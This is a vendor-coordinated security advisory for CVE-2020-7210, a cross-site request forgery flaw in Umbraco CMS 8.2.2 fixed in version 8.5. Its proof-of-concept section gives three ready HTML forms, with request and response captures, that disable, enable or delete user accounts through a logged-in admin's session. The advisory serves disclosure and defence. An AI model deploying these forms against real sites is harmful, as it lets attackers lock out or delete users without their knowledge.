Umbraco CMS 8.2.2 Cross Site Request Forgery

`SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >  
=======================================================================  
title: Cross-Site Request Forgery (CSRF)  
product: Umbraco CMS  
vulnerable version: version 8.2.2  
fixed version: version 8.5  
CVE number: CVE-2020-7210  
impact: medium  
homepage: https://umbraco.com/  
found: October 2019  
by: A. Melnikova (Office Moscow)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best  
version of Umbraco and a big step forward in regard to making your work  
with Umbraco simpler; simpler to extend, simpler to edit, simpler to  
publish - simpler to use, simpler to enjoy."  
  
Source: https://umbraco.com/products/umbraco-cms/umbraco-8/  
  
  
Business recommendation:  
------------------------  
The vendor provides a patch and users of this product are urged to  
immediately upgrade to the latest version available.  
  
SEC Consult recommends to perform a thorough security review conducted by  
security professionals to identify and resolve all security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Cross-Site Request Forgery (CSRF)  
An attacker can use cross-site request forgery to perform arbitrary web  
requests with the identity of the victim, without being noticed by the  
victim. This attack always requires some sort of user interaction, usually  
the victim needs to click on an attacker-prepared link or visit a page  
under control of the attacker. Due to this, an attacker is able to  
enable/disable or delete accounts. This may lead to DoS of user accounts.  
  
  
Proof of concept:  
-----------------  
1) Cross-Site Request Forgery (CSRF)  
In a live attack scenario, the following HTML document would be hosted  
on a malicious website, controlled by the attacker.  
  
Example 1: HTML-code for disabling user:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>" method="POST">  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
Request:  
--------  
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID> HTTP/1.1  
Host: <host-URL>  
[...]  
Cookie: <ADMIN-COOKIE>  
  
  
Response:  
---------  
HTTP/1.1 200 OK  
Cache-Control: no-store, must-revalidate, no-cache, max-age=0  
Pragma: no-cache  
Content-Length: 112  
Content-Type: application/json; charset=utf-8  
Expires: Mon, 01 Jan 1990 00:00:00 GMT  
Set-Cookie: <ADMIN-COOKIE>  
Date: Wed, 06 Nov 2019 10:57:45 GMT  
Connection: close  
  
)]}',  
{"notifications":[{"header":"<USERNAME> is now disabled","message":"","type":3}],"message":"<USERNAME> is now disabled"}  
  
  
Example 2: HTML-code for enabling user:  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID>" method="POST">  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
Request:  
--------  
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID> HTTP/1.1  
Host: <host-URL>  
[...]  
Cookie: <ADMIN-COOKIE>  
  
  
Response:  
---------  
HTTP/1.1 200 OK  
Cache-Control: no-store, must-revalidate, no-cache, max-age=0  
Pragma: no-cache  
Content-Length: 110  
Content-Type: application/json; charset=utf-8  
Expires: Mon, 01 Jan 1990 00:00:00 GMT  
Date: Wed, 06 Nov 2019 10:58:12 GMT  
Connection: close  
  
)]}',  
{"notifications":[{"header":"<USERNAME> is now enabled","message":"","type":3}],"message":"<USERNAME> is now enabled"}  
  
  
Example 3: HTML-code for deleting user:  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID>" method="POST">  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
Request:  
--------  
POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID> HTTP/1.1  
Host: <host-URL>  
[...]  
Cookie: <ADMIN-COOKIE>  
  
  
Response:  
---------  
HTTP/1.1 200 OK  
Cache-Control: no-store, must-revalidate, no-cache, max-age=0  
Pragma: no-cache  
Content-Length: 114  
Content-Type: application/json; charset=utf-8  
Expires: Mon, 01 Jan 1990 00:00:00 GMT  
Set-Cookie: <ADMIN-COOKIE>  
Date: Wed, 06 Nov 2019 10:58:36 GMT  
Connection: close  
  
)]}',  
{"notifications":[{"header":"User <USERNAME> was deleted","message":"","type":3}],"message":"User <USERNAME> was deleted"}  
  
  
As soon as an authenticated victim (admin) visits a website with this HTML code  
embedded, the payload would get executed in the context of the victim's  
session. Although responses to these requests are not delivered to the  
attacker, in many cases it is sufficient to be able to compromise the  
integrity of the victim's information stored on the site or to perform  
certain, possibly compromising requests to other sites.  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version was tested and found to be vulnerable:  
* version 8.2.2  
  
  
Vendor contact timeline:  
------------------------  
2019-11-13: Contacting vendor through [email protected].  
2019-11-13: Requesting encryption keys.  
2019-11-14: Encryption issues.  
2019-11-15: Encryption issues, sending advisory in unencrypted form.  
2019-11-25: No response, requesting status update.  
2019-11-28: Vendor confirmed vulnerability.  
2020-01-03: Confirming the release date.  
2020-01-14: Release of updated CMS version 8.5.0.  
2020-01-23: Release of security advisory.  
  
  
Solution:  
---------  
The vendor provides an updated version which should be installed immediately:  
https://our.umbraco.com/download/releases/850  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF A. Melnikova / @2020  
  
`